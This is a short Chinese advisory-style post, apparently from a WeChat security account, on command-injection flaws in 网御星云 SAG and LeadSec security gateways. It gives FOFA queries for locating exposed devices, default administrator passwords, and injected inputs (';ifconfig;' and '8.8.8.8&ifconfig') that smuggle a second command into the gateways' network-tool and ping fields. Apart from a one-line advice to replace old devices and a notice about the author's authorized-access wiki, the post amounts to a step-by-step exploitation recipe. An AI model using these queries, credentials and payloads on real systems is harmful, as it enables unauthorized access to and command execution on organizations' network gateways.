描述
网御星云安全网关有两个系列,SAG系列和Power V-VPN系列,SAG系列是比较老的一款产品,于2016年9月正式退市,但现网还存在不少未替换的SAG系列,该系列V3.1.3.1及以前版本存在后台命令执行漏洞。
影响范围
网御星云安全网关SAG系列和LeadSec系列<=V3.1.3.1版本
防护建议
及时进行换新安全网关防护,旧版本及时下架。
LeadSec系列漏洞:
FOFA:
icon_hash="-948153991"利用弱口令(yyds):
账号:administrator 密码:administrator
漏洞点位于:
网关管理->网络工具,在目的主机处填写:
;ifconfig;
网御星云安全网关系列:
FOFA:
title="网御 安全网关"利用弱口令(yyds):
账号:administrator 密码:leadsec@7766
漏洞点位于:
状态监控->网络测试->ping处输入:
8.8.8.8&ifconfig
老旧的退役设备请及时替换,不要给黑客留下机会。
最后再说一下漏洞文库wiki.xypbk.com已经添加授权访问
获取授权方式为后台回复:文库授权
为防止黑产份子的非法利用漏洞,不给国家安全添麻烦,本站从此开启授权访问,形式以每人单独授权发放,限量1000人,请勿分享您获取的账号密码,账号密码具都采用随机生成的32位MD5,还请牢记。
如若因漏洞利用产生重大影响,会根据登录IP、请求内容、申请授权等信息进行查证,查证后将对号主进行追责,故不要分享账号,终害己身。
虽然比较麻烦了些,但会稍微对黑产份子有一些限制,保证了本站安全,也保证国家安全。同时有些敏感东西也能第一时间放出来了,还请大家谅解。
同时本站承诺永远不会出现买卖账号等利益相关的事情,本站永不割韭菜,永久免费检索,坚决抵制安全圈的歪风邪气。
最后,若大家对此有意见请后台留言,本站将及时改正,若内容有侵犯您的权益,请及时提出,进行删除处理。
本站能坚持多久全看大家是否滥用,内容若更新较慢也请谅解,本人有工作有生活,会尽量坚持更新的。
扫取二维码获取
更多精彩
Qingy之安全
点个在看你最好看
本文始发于微信公众号(Qingy之安全):网御星云-安全网关SAG系列和LeadSec系列后台命令执行漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论